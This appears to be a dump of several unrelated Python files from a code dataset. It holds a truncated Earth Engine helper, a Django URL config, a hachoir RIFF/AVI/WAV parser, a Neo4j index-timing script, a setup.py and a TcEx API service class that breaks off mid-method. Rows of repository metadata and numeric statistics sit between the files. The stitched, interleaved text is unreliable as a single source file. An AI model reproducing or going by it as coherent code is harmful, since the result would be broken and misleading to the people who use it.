minElev = minmaxElev.get('elevation_min').getInfo()
maxElev = minmaxElev.get('elevation_max').getInfo()
ciesinPopGrid = ee.Image('CIESIN/GPWv4/population-count/2020')
popDict = ciesinPopGrid.reduceRegion(
ee.Reducer.sum(), extentGeom, maxPixels=500000000)
pop = popDict.get('population-count').getInfo()
pop = int(pop)
return {
'minElev': minElev,
'maxElev': maxElev,
'pop': pop
}
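# Editor's note: usage sketch; the extent is a polygon ring of [lon, lat]
# pairs (the coordinates below are placeholders):
#
#     getStatistics([[[-1, 1], [1, 1], [1, -1], [-1, -1], [-1, 1]]])
#     # -> {'minElev': ..., 'maxElev': ..., 'pop': ...}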
| 38.704268
| 130
| 0.605593
| 2,617
| 25,390
| 5.838365
| 0.185327
| 0.032463
| 0.021598
| 0.014137
| 0.387394
| 0.317691
| 0.278814
| 0.252634
| 0.236861
| 0.213496
| 0
| 0.038154
| 0.24746
| 25,390
| 655
| 131
| 38.763359
| 0.761501
| 0.035841
| 0
| 0.294231
| 0
| 0.059615
| 0.12065
| 0.026416
| 0
| 0
| 0
| 0.001527
| 0
| 1
| 0.094231
| false
| 0.003846
| 0.015385
| 0.015385
| 0.244231
| 0.001923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e8cedec4a5704ab1636f88d9b806e93b86ff8a
| 1,186
|
py
|
Python
|
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | null | null | null |
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | 4
|
2021-03-19T03:22:44.000Z
|
2022-03-11T23:58:10.000Z
|
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path,include
from django.views.generic import TemplateView
from .views import Index,SignUp,UserDashboard,AdminDashboard,logout,showAdminData,deleteuser,activeUser,deactiveUser,UserDetailEdit,uploadImage
# from .views import Index,UserDashboard,SignUp,AdminDashboard
app_name='management'
urlpatterns = [
# path('',homepage,name="index"),
path('',Index.as_view(), name='index'),
path('signup',SignUp.as_view(),name="signup"),
path('userdashboard',UserDashboard.as_view(),name="userDashboard"),
path('admindashboard',AdminDashboard.as_view(),name="adminDashboard"),
path('admindashboard/showuserdata/',showAdminData.as_view(),name='showAdminData'),
path('admindashboard/showuserdata/deleteuser/<userId>',deleteuser,name='deleteuser'),
path('admindashboard/showuserdata/activeUser/<userId>', activeUser, name='activeUser'),
path('admindashboard/showuserdata/deactiveUser/<userId>', deactiveUser, name='deactiveUser'),
path('uploadimage/',uploadImage,name="uploadImage"),
path('editUserDetail/',UserDetailEdit.as_view(),name='userEditDetail'),
path('logout',logout,name='logout')
]
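# Editor's note: with app_name = 'management', these routes are reversed
# through the namespace, e.g. from a view or test:
#
#     from django.urls import reverse
#     reverse('management:signup')
#     reverse('management:deleteuser', kwargs={'userId': '42'})
#
# The resulting paths depend on where this urlconf is included.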
| 49.416667
| 143
| 0.764755
| 122
| 1,186
| 7.377049
| 0.270492
| 0.04
| 0.066667
| 0.044444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080101
| 1,186
| 23
| 144
| 51.565217
| 0.824931
| 0.077572
| 0
| 0
| 0
| 0
| 0.331193
| 0.156881
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e96b9312873b5f396a18010caddd4d11bd8888
| 16,962
|
py
|
Python
|
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
"""
RIFF parser, able to parse:
* AVI video container
* WAV audio container
* CDA file
Documents:
- libavformat source code from ffmpeg library
http://ffmpeg.mplayerhq.hu/
- Video for Windows Programmer's Guide
http://www.opennet.ru/docs/formats/avi.txt
- What is an animated cursor?
http://www.gdgsoft.com/anituner/help/aniformat.htm
Authors:
* Aurélien Jacobs
* Mickaël KENIKSSI
* Victor Stinner
Changelog:
* 2007-03-30: support ACON (animated icons)
* 2006-08-08: merge AVI, WAV and CDA parsers into RIFF parser
* 2006-08-03: creation of CDA parser by Mickaël KENIKSSI
* 2005-06-21: creation of WAV parser by Victor Stinner
* 2005-06-08: creation of AVI parser by Victor Stinner and Aurélien Jacobs
Thanks to:
* Wojtek Kaniewski (wojtekka AT logonet.com.pl) for its CDA file
format information
"""
from lib.hachoir_parser import Parser
from lib.hachoir_core.field import (FieldSet, ParserError,
UInt8, UInt16, UInt32, Enum,
Bit, NullBits, NullBytes,
RawBytes, String, PaddingBytes,
SubFile)
from lib.hachoir_core.tools import alignValue, humanDuration
from lib.hachoir_core.endian import LITTLE_ENDIAN
from lib.hachoir_core.text_handler import filesizeHandler, textHandler
from lib.hachoir_parser.video.fourcc import audio_codec_name, video_fourcc_name
from lib.hachoir_parser.image.ico import IcoFile
from datetime import timedelta
def parseText(self):
yield String(self, "text", self["size"].value,
strip=" \0", truncate="\0",
charset="ISO-8859-1")
def parseRawFormat(self, size):
yield RawBytes(self, "raw_format", size)
def parseVideoFormat(self, size):
yield UInt32(self, "video_size", "Video format: Size")
yield UInt32(self, "width", "Video format: Width")
yield UInt32(self, "height", "Video format: Height")
yield UInt16(self, "panes", "Video format: Panes")
yield UInt16(self, "depth", "Video format: Depth")
yield UInt32(self, "tag1", "Video format: Tag1")
yield UInt32(self, "img_size", "Video format: Image size")
yield UInt32(self, "xpels_meter", "Video format: XPelsPerMeter")
yield UInt32(self, "ypels_meter", "Video format: YPelsPerMeter")
yield UInt32(self, "clr_used", "Video format: ClrUsed")
yield UInt32(self, "clr_important", "Video format: ClrImportant")
def parseAudioFormat(self, size):
yield Enum(UInt16(self, "codec", "Audio format: Codec id"), audio_codec_name)
yield UInt16(self, "channel", "Audio format: Channels")
yield UInt32(self, "sample_rate", "Audio format: Sample rate")
yield UInt32(self, "bit_rate", "Audio format: Bit rate")
yield UInt16(self, "block_align", "Audio format: Block align")
if size >= 16:
yield UInt16(self, "bits_per_sample", "Audio format: Bits per sample")
if size >= 18:
yield UInt16(self, "ext_size", "Audio format: Size of extra information")
if size >= 28: # and self["channel"].value > 2
yield UInt16(self, "reserved", "Audio format: ")
yield UInt32(self, "channel_mask", "Audio format: channels placement bitmask")
yield UInt32(self, "subformat", "Audio format: Subformat id")
def parseAVIStreamFormat(self):
size = self["size"].value
strtype = self["../stream_hdr/stream_type"].value
TYPE_HANDLER = {
"vids": (parseVideoFormat, 40),
"auds": (parseAudioFormat, 16)
}
handler = parseRawFormat
if strtype in TYPE_HANDLER:
info = TYPE_HANDLER[strtype]
if info[1] <= size:
handler = info[0]
for field in handler(self, size):
yield field
def parseAVIStreamHeader(self):
if self["size"].value != 56:
raise ParserError("Invalid stream header size")
yield String(self, "stream_type", 4, "Stream type four character code", charset="ASCII")
field = String(self, "fourcc", 4, "Stream four character code", strip=" \0", charset="ASCII")
if self["stream_type"].value == "vids":
yield Enum(field, video_fourcc_name, lambda text: text.upper())
else:
yield field
yield UInt32(self, "flags", "Stream flags")
yield UInt16(self, "priority", "Stream priority")
yield String(self, "language", 2, "Stream language", charset="ASCII", strip="\0")
yield UInt32(self, "init_frames", "InitialFrames")
yield UInt32(self, "scale", "Time scale")
yield UInt32(self, "rate", "Divide by scale to give frame rate")
yield UInt32(self, "start", "Stream start time (unit: rate/scale)")
yield UInt32(self, "length", "Stream length (unit: rate/scale)")
yield UInt32(self, "buf_size", "Suggested buffer size")
yield UInt32(self, "quality", "Stream quality")
yield UInt32(self, "sample_size", "Size of samples")
yield UInt16(self, "left", "Destination rectangle (left)")
yield UInt16(self, "top", "Destination rectangle (top)")
yield UInt16(self, "right", "Destination rectangle (right)")
yield UInt16(self, "bottom", "Destination rectangle (bottom)")
class RedBook(FieldSet):
"""
RedBook offset parser, used in CD audio (.cda) file
"""
def createFields(self):
yield UInt8(self, "frame")
yield UInt8(self, "second")
yield UInt8(self, "minute")
yield PaddingBytes(self, "notused", 1)
def formatSerialNumber(field):
"""
Format a disc serial number.
Eg. 0x00085C48 => "0008-5C48"
"""
sn = field.value
return "%04X-%04X" % (sn >> 16, sn & 0xFFFF)
def parseCDDA(self):
"""
HSG address format: number of 1/75 second
HSG offset = (minute*60 + second)*75 + frame + 150 (from RB offset)
HSG length = (minute*60 + second)*75 + frame (from RB length)
"""
yield UInt16(self, "cda_version", "CD file version (currently 1)")
yield UInt16(self, "track_no", "Number of track")
yield textHandler(UInt32(self, "disc_serial", "Disc serial number"),
formatSerialNumber)
yield UInt32(self, "hsg_offset", "Track offset (HSG format)")
yield UInt32(self, "hsg_length", "Track length (HSG format)")
yield RedBook(self, "rb_offset", "Track offset (Red-book format)")
yield RedBook(self, "rb_length", "Track length (Red-book format)")
def parseWAVFormat(self):
size = self["size"].value
if size not in (16, 18):
self.warning("Format with size of %s bytes is not supported!" % size)
yield Enum(UInt16(self, "codec", "Audio codec"), audio_codec_name)
yield UInt16(self, "nb_channel", "Number of audio channel")
yield UInt32(self, "sample_per_sec", "Sample per second")
yield UInt32(self, "byte_per_sec", "Average byte per second")
yield UInt16(self, "block_align", "Block align")
yield UInt16(self, "bit_per_sample", "Bits per sample")
def parseWAVFact(self):
yield UInt32(self, "nb_sample", "Number of samples in audio stream")
def parseAviHeader(self):
yield UInt32(self, "microsec_per_frame", "Microsecond per frame")
yield UInt32(self, "max_byte_per_sec", "Maximum byte per second")
yield NullBytes(self, "reserved", 4)
# Flags
yield NullBits(self, "reserved[]", 4)
yield Bit(self, "has_index")
yield Bit(self, "must_use_index")
yield NullBits(self, "reserved[]", 2)
yield Bit(self, "is_interleaved")
yield NullBits(self, "reserved[]", 2)
yield Bit(self, "trust_cktype")
yield NullBits(self, "reserved[]", 4)
yield Bit(self, "was_capture_file")
yield Bit(self, "is_copyrighted")
yield NullBits(self, "reserved[]", 14)
yield UInt32(self, "total_frame", "Total number of frames in the video")
yield UInt32(self, "init_frame", "Initial frame (used in interleaved video)")
yield UInt32(self, "nb_stream", "Number of streams")
yield UInt32(self, "sug_buf_size", "Suggested buffer size")
yield UInt32(self, "width", "Width in pixel")
yield UInt32(self, "height", "Height in pixel")
yield UInt32(self, "scale")
yield UInt32(self, "rate")
yield UInt32(self, "start")
yield UInt32(self, "length")
def parseODML(self):
yield UInt32(self, "total_frame", "Real number of frame of OpenDML video")
padding = self["size"].value - 4
if 0 < padding:
yield NullBytes(self, "padding[]", padding)
class AVIIndexEntry(FieldSet):
size = 16*8
def createFields(self):
yield String(self, "tag", 4, "Tag", charset="ASCII")
yield UInt32(self, "flags")
yield UInt32(self, "start", "Offset from start of movie data")
yield UInt32(self, "length")
def parseIndex(self):
while not self.eof:
yield AVIIndexEntry(self, "index[]")
class Chunk(FieldSet):
TAG_INFO = {
# This dictionary is edited by RiffFile.validate()
"LIST": ("list[]", None, "Sub-field list"),
"JUNK": ("junk[]", None, "Junk (padding)"),
# Metadata
"INAM": ("title", parseText, "Document title"),
"IART": ("artist", parseText, "Artist"),
"ICMT": ("comment", parseText, "Comment"),
"ICOP": ("copyright", parseText, "Copyright"),
"IENG": ("author", parseText, "Author"),
"ICRD": ("creation_date", parseText, "Creation date"),
"ISFT": ("producer", parseText, "Producer"),
"IDIT": ("datetime", parseText, "Date time"),
# TODO: see below
# "strn": Stream description
# TWOCC code, movie/field[]/tag.value[2:4]:
# "db": "Uncompressed video frame",
# "dc": "Compressed video frame",
# "wb": "Audio data",
# "pc": "Palette change"
}
subtag_info = {
"INFO": ("info", "File informations"),
"hdrl": ("headers", "Headers"),
"strl": ("stream[]", "Stream header list"),
"movi": ("movie", "Movie stream"),
"odml": ("odml", "ODML"),
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = (8 + alignValue(self["size"].value, 2)) * 8
tag = self["tag"].value
if tag in self.TAG_INFO:
self.tag_info = self.TAG_INFO[tag]
if tag == "LIST":
subtag = self["subtag"].value
if subtag in self.subtag_info:
info = self.subtag_info[subtag]
self.tag_info = (info[0], None, info[1])
self._name = self.tag_info[0]
self._description = self.tag_info[2]
else:
self.tag_info = ("field[]", None, None)
def createFields(self):
yield String(self, "tag", 4, "Tag", charset="ASCII")
yield filesizeHandler(UInt32(self, "size", "Size"))
if not self["size"].value:
return
if self["tag"].value == "LIST":
yield String(self, "subtag", 4, "Sub-tag", charset="ASCII")
handler = self.tag_info[1]
while 8 < (self.size - self.current_size)/8:
field = self.__class__(self, "field[]")
yield field
if (field.size/8) % 2 != 0:
yield UInt8(self, "padding[]", "Padding")
else:
handler = self.tag_info[1]
if handler:
for field in handler(self):
yield field
else:
yield RawBytes(self, "raw_content", self["size"].value)
padding = self.seekBit(self._size)
if padding:
yield padding
def createDescription(self):
tag = self["tag"].display
return u"Chunk (tag %s)" % tag
class ChunkAVI(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
"strh": ("stream_hdr", parseAVIStreamHeader, "Stream header"),
"strf": ("stream_fmt", parseAVIStreamFormat, "Stream format"),
"avih": ("avi_hdr", parseAviHeader, "AVI header"),
"idx1": ("index", parseIndex, "Stream index"),
"dmlh": ("odml_hdr", parseODML, "ODML header"),
})
class ChunkCDDA(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'fmt ': ("cdda", parseCDDA, "CD audio informations"),
})
class ChunkWAVE(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'fmt ': ("format", parseWAVFormat, "Audio format"),
'fact': ("nb_sample", parseWAVFact, "Number of samples"),
'data': ("audio_data", None, "Audio stream data"),
})
def parseAnimationHeader(self):
yield UInt32(self, "hdr_size", "Size of header (36 bytes)")
if self["hdr_size"].value != 36:
self.warning("Animation header with unknown size (%s)" % self["size"].value)
yield UInt32(self, "nb_frame", "Number of unique Icons in this cursor")
yield UInt32(self, "nb_step", "Number of Blits before the animation cycles")
yield UInt32(self, "cx")
yield UInt32(self, "cy")
yield UInt32(self, "bit_count")
yield UInt32(self, "planes")
yield UInt32(self, "jiffie_rate", "Default Jiffies (1/60th of a second) if rate chunk not present")
yield Bit(self, "is_icon")
yield NullBits(self, "padding", 31)
def parseAnimationSequence(self):
while not self.eof:
yield UInt32(self, "icon[]")
def formatJiffie(field):
sec = float(field.value) / 60
return humanDuration(timedelta(seconds=sec))
def parseAnimationRate(self):
while not self.eof:
yield textHandler(UInt32(self, "rate[]"), formatJiffie)
def parseIcon(self):
yield SubFile(self, "icon_file", self["size"].value, parser_class=IcoFile)
class ChunkACON(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'anih': ("anim_hdr", parseAnimationHeader, "Animation header"),
'seq ': ("anim_seq", parseAnimationSequence, "Animation sequence"),
'rate': ("anim_rate", parseAnimationRate, "Animation sequence"),
'icon': ("icon[]", parseIcon, "Icon"),
})
class RiffFile(Parser):
PARSER_TAGS = {
"id": "riff",
"category": "container",
"file_ext": ("avi", "cda", "wav", "ani"),
"min_size": 16*8,
"mime": (u"video/x-msvideo", u"audio/x-wav", u"audio/x-cda"),
# FIXME: Use regex "RIFF.{4}(WAVE|CDDA|AVI )"
"magic": (
("AVI LIST", 8*8),
("WAVEfmt ", 8*8),
("CDDAfmt ", 8*8),
("ACONanih", 8*8),
),
"description": "Microsoft RIFF container"
}
VALID_TYPES = {
"WAVE": (ChunkWAVE, u"audio/x-wav", u"Microsoft WAVE audio", ".wav"),
"CDDA": (ChunkCDDA, u"audio/x-cda", u"Microsoft Windows audio CD file (cda)", ".cda"),
"AVI ": (ChunkAVI, u"video/x-msvideo", u"Microsoft AVI video", ".avi"),
"ACON": (ChunkACON, u"image/x-ani", u"Microsoft Windows animated cursor", ".ani"),
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "RIFF":
return "Wrong signature"
if self["type"].value not in self.VALID_TYPES:
return "Unknown RIFF content type"
return True
def createFields(self):
yield String(self, "signature", 4, "AVI header (RIFF)", charset="ASCII")
yield filesizeHandler(UInt32(self, "filesize", "File size"))
yield String(self, "type", 4, "Content type (\"AVI \", \"WAVE\", ...)", charset="ASCII")
# Choose chunk type depending on file type
try:
chunk_cls = self.VALID_TYPES[self["type"].value][0]
except KeyError:
chunk_cls = Chunk
# Parse all chunks up to filesize
while self.current_size < self["filesize"].value*8+8:
yield chunk_cls(self, "chunk[]")
if not self.eof:
yield RawBytes(self, "padding[]", (self.size-self.current_size)/8)
def createMimeType(self):
try:
return self.VALID_TYPES[self["type"].value][1]
except KeyError:
return None
def createDescription(self):
tag = self["type"].value
if tag == "AVI ":
desc = u"Microsoft AVI video"
if "headers/avi_hdr" in self:
header = self["headers/avi_hdr"]
desc += ": %ux%u pixels" % (header["width"].value, header["height"].value)
microsec = header["microsec_per_frame"].value
if microsec:
desc += ", %.1f fps" % (1000000.0 / microsec)
if "total_frame" in header and header["total_frame"].value:
delta = timedelta(microseconds=float(header["total_frame"].value) * microsec)  # frames * microsec_per_frame is in microseconds
desc += ", " + humanDuration(delta)
return desc
else:
try:
return self.VALID_TYPES[tag][2]
except KeyError:
return u"Microsoft RIFF container"
def createContentSize(self):
size = (self["filesize"].value + 8) * 8
return min(size, self.stream.size)
def createFilenameSuffix(self):
try:
return self.VALID_TYPES[self["type"].value][3]
except KeyError:
return ".riff"
| 38.55
| 103
| 0.614432
| 2,069
| 16,962
| 4.958434
| 0.212663
| 0.054586
| 0.076031
| 0.00926
| 0.172336
| 0.107905
| 0.064919
| 0.058485
| 0.035676
| 0.027878
| 0
| 0.027067
| 0.242012
| 16,962
| 439
| 104
| 38.637813
| 0.770864
| 0.092619
| 0
| 0.147929
| 0
| 0
| 0.274117
| 0.001633
| 0
| 0
| 0.000392
| 0.002278
| 0
| 1
| 0.085799
| false
| 0
| 0.026627
| 0
| 0.210059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5eb56662663b212c6709a52f8fbe61a75880b3c
| 800
|
py
|
Python
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 245
|
2018-04-07T00:14:56.000Z
|
2022-03-28T05:51:35.000Z
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 47
|
2018-04-02T16:41:22.000Z
|
2022-03-24T01:40:46.000Z
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 140
|
2018-08-09T15:54:47.000Z
|
2022-03-30T12:44:48.000Z
|
from datetime import datetime
with open('/home/neo4j/neo4j-community-3.5.1/logs/debug.log', 'r') as log:
begin = []
end = []
for line in log:
if 'Index population started' in line:
begin.append(line[:23])
elif 'Index creation finished' in line:
end.append(line[:23])
if len(begin) == 0 or len(begin) > 9:
print("Something went wrong. Please check debug.log")
elif len(begin) != len(end):
print("{}/{} Done. Please come back later.".format(len(end), len(begin)))
else:
elapsed_time = 0
for i in range(len(begin)):  # range(0,9) assumed exactly nine indexes and raises IndexError when fewer finished
begin_tmp = datetime.strptime(begin[i], '%Y-%m-%d %H:%M:%S.%f')
end_tmp = datetime.strptime(end[i], '%Y-%m-%d %H:%M:%S.%f')
elapsed_time += (end_tmp-begin_tmp).total_seconds()
print("Done in {} s".format(elapsed_time))
| 34.782609
| 77
| 0.6175
| 128
| 800
| 3.796875
| 0.46875
| 0.065844
| 0.049383
| 0.016461
| 0.032922
| 0.032922
| 0.032922
| 0.032922
| 0
| 0
| 0
| 0.021807
| 0.1975
| 800
| 22
| 78
| 36.363636
| 0.735202
| 0
| 0
| 0
| 0
| 0
| 0.28375
| 0.06
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0.15
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ec93a99d9c113668c2693c8d65499328f692cd
| 1,489
|
py
|
Python
|
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
:file: setup.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2021/09/20 11:11:54
'''
from os import path
from setuptools import setup, find_packages
basedir = path.abspath(path.dirname(__file__))
with open(path.join(basedir, "README.md"), encoding='utf-8') as f:
long_description = f.read()
setup(
name="zf-school-sdk",
author="farmer.chillax",
version="1.3.2",
license='MIT',
author_email="farmer-chong@qq.com",
description="zf School SDK for Python",
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/Farmer-chong/new-school-sdk',
packages=find_packages(),
# package_data={},
package_data={"school_sdk": ['check_code/model.pkl']},
include_package_data=True,
platforms='any',
zip_safe=False,
install_requires=[
'requests',
'pyquery',
'bs4',
'Pillow',
'fake-headers',
'torch',
'torchvision',
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.8',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
# python zf-setup.py bdist_wheel sdist
# twine upload dist/*
| 26.589286
| 70
| 0.620551
| 172
| 1,489
| 5.244186
| 0.662791
| 0.066519
| 0.02439
| 0.066519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021701
| 0.226326
| 1,489
| 56
| 71
| 26.589286
| 0.761285
| 0.126931
| 0
| 0
| 0
| 0
| 0.403454
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.051282
| 0
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5edd2119227be04c5621c163a6292b04c441de0
| 10,716
|
py
|
Python
|
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
"""TcEx Framework API Service module."""
# standard library
import json
import sys
import threading
import traceback
from io import BytesIO
from typing import Any
from .common_service import CommonService
class ApiService(CommonService):
"""TcEx Framework API Service module."""
def __init__(self, tcex: object):
"""Initialize the Class properties.
Args:
tcex: Instance of TcEx.
"""
super().__init__(tcex)
# properties
self._metrics = {'Errors': 0, 'Requests': 0, 'Responses': 0}
# config callbacks
self.api_event_callback = None
@property
def command_map(self) -> dict:
"""Return the command map for the current Service type."""
command_map = super().command_map
command_map.update({'runservice': self.process_run_service_command})
return command_map
def format_query_string(self, params: dict) -> str:
"""Convert name/value array to a query string.
Args:
params: The query params for the request.
Returns:
str: The query params reformatted as a string.
"""
query_string = []
try:
for q in params:
query_string.append(f'''{q.get('name')}={q.get('value')}''')
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-params-provided, params={params}, error="""{e}"""'
)
self.log.trace(traceback.format_exc())
return '&'.join(query_string)
def format_request_headers(self, headers: dict) -> dict:
"""Convert name/value array to a headers dict.
Args:
headers: The dict of key/value header data.
Returns:
dict: The restructured header data.
"""
headers_ = {}
try:
for h in headers:
# TODO: either support tuple or csv list of values
# headers_.setdefault(h.get('name').lower(), []).append(h.get('value'))
headers_.setdefault(h.get('name').lower(), str(h.get('value')))
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-headers-provided, '
f'headers={headers}, error="""{e}"""'
)
self.log.trace(traceback.format_exc())
return headers_
def format_response_headers(self, headers: list) -> list:
"""Convert header tuples to a list of name/value dicts.
Args:
headers: The list of (name, value) header tuples.
Returns:
list: The restructured header data.
"""
headers_ = []
try:
for h in headers:
headers_.append({'name': h[0], 'value': h[1]})
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-headers-provided, '
f'headers={headers}, error="""{e}"""'
)
self.log.trace(traceback.format_exc())
return headers_
def process_run_service_response(self, *args, **kwargs) -> None:
"""Handle service event responses.
('200 OK', [('content-type', 'application/json'), ('content-length', '103')])
"""
self.log.info('feature=api-service, event=response-received, status=waiting-for-body')
kwargs.get('event').wait(30) # wait for thread event - (set on body write)
self.log.trace(f'feature=api-service, event=response, args={args}')
try:
status_code, status = args[0].split(' ', 1)
response = {
'bodyVariable': 'response.body',
'command': 'Acknowledged',
'headers': self.format_response_headers(args[1]),
'requestKey': kwargs.get('request_key'), # pylint: disable=cell-var-from-loop
'status': status,
'statusCode': status_code,
'type': 'RunService',
}
self.log.info('feature=api-service, event=response-sent')
self.message_broker.publish(json.dumps(response), self.args.tc_svc_client_topic)
self.increment_metric('Responses')
except Exception as e:
self.log.error(
f'feature=api-service, event=failed-creating-response-body, error="""{e}"""'
)
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
def process_run_service_command(self, message: dict) -> None:
"""Process the RunService command.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "RunService",
"apiToken": "abc123",
"bodyVariable": "request.body",
"headers": [ { key/value pairs } ],
"method": "GET",
"queryParams": [ { key/value pairs } ],
"requestKey": "123abc",
"userConfig": [{
"name": "tlpExportSetting",
"value": "TLP:RED"
}],
}
Args:
message: The message payload from the server topic.
"""
# register config apiToken (before any logging)
self.token.register_token(
self.thread_name, message.get('apiToken'), message.get('expireSeconds')
)
self.log.info(f'feature=api-service, event=runservice-command, message="{message}"')
# thread event used to block response until body is written
event = threading.Event()
# process message
request_key: str = message.get('requestKey')
body = None
try:
# read body from redis
body_variable: str = message.pop('bodyVariable', None)
if body_variable is not None:
body: Any = self.key_value_store.read(request_key, body_variable)
if body is not None:
# for API service the data in Redis is not b64 encoded
body = BytesIO(body)
except Exception as e:
self.log.error(f'feature=api-service, event=failed-reading-body, error="""{e}"""')
self.log.trace(traceback.format_exc())
headers: dict = self.format_request_headers(message.pop('headers'))
method: str = message.pop('method')
params: dict = message.pop('queryParams')
path: str = message.pop('path')
try:
environ = {
'wsgi.errors': sys.stderr,
'wsgi.input': body,
'wsgi.multithread': True,
'wsgi.multiprocess': False,
'wsgi.run_once': True,
'wsgi.url_scheme': 'https',
'wsgi.version': (1, 0),
'PATH_INFO': path,
'QUERY_STRING': self.format_query_string(params),
'REMOTE_ADDR': message.get('remoteAddress', ''),
# 'REMOTE_HOST': message.get('remoteAddress', ''),
'REQUEST_METHOD': method.upper(),
'SCRIPT_NAME': '/',
'SERVER_NAME': '',
'SERVER_PORT': '',
'SERVER_PROTOCOL': 'HTTP/1.1',
}
# Add user config for TAXII or other service that supports the data type
environ['user_config'] = message.get('userConfig', [])
# add headers
if headers.get('content-type') is not None:
environ['CONTENT_TYPE'] = headers.pop('content-type')
# add content length
if headers.get('content-length') is not None:
environ['CONTENT_LENGTH'] = headers.pop('content-length')
for header, value in headers.items():
environ[f'HTTP_{header}'.upper()] = value
# make values from message available in env in camel
# case (e.g., falcon -> req.env.get('request_url'))
for key, value in message.items():
if key not in environ and self.tcex.utils.camel_to_snake(key) not in environ:
environ[self.tcex.utils.camel_to_snake(key)] = value
self.log.trace(f'feature=api-service, environ={environ}')
self.increment_metric('Requests')
